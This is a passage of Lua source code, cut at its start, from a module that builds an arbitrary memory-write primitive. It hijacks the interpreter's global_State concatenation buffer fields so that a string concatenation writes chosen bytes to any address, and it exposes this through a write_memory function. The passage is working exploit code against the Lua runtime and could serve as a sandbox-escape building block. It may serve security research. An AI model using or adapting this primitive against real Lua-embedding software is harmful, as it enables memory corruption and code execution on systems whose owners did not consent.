    -- can be restored.
    local old_mbuff_buffer = _M.read_tvalue(concat_mbuff_addr_buffer)
    old_mbuff_buffer = nil -- Clears the type-tag field, leaves value intact. This
                           -- makes the value safe for calls like luaC_barrierback.
    local old_mbuff_n = _M.read_tvalue(concat_mbuff_addr_n)
    old_mbuff_n = nil -- ditto.
    local old_mbuff_buffsize = _M.read_tvalue(concat_mbuff_addr_buffsize)
    old_mbuff_buffsize = nil -- ditto.
    -- Overwriting the Mbuffer fields will probably overwrite the fields immediately
    -- after it in the global_State, so save them too.
    local old_pause = collectgarbage("setpause", 1)
    local old_stepmul = collectgarbage("setstepmul", 1)
    -- Set the buffer to be used for concatenation to be the memory we want to write
    -- to.
    concat_mbuff_set_buffer(address)
    concat_mbuff_set_buffsize(buffsize)
    -- Perform a concatenation whose result is the bytes we want to write.
    content = content:sub(1, -2) .. content:sub(-1, -1)
    -- Restore the fields of the global_State.
    concat_mbuff_set_buffer(old_mbuff_buffer)
    concat_mbuff_set_n(old_mbuff_n)
    concat_mbuff_set_buffsize(old_mbuff_buffsize)
    collectgarbage("setpause", old_pause)
    collectgarbage("setstepmul", old_stepmul)
  end

  -- Write an arbitrary block of memory in the address space of the Lua state.
  -- @param address The address in memory at which to start writing. This should be
  --                either a number representing an address, or a string whose byte
  --                representation is a native pointer.
  -- @param content A string whose contents should be written, byte-for-byte, to the
  --                memory range [address, address+#content). This string cannot have
  --                length one; to write individual bytes, you must read an adjacent
  --                byte and then write two bytes.
  -- @throw An error is thrown if "content" is exactly one byte long.
  function _M.write_memory(address, content)
    if #content == 0 then
      -- Nothing to do
      return
    end
    assert(#content ~= 1, "Cannot write single bytes")
    local buffsize = ptr2num(_M.pack_uint(#content, sizeof_pointer))
    without_gc(do_write_memory, ptr2num(address), content, buffsize)
  end
end

end

return _M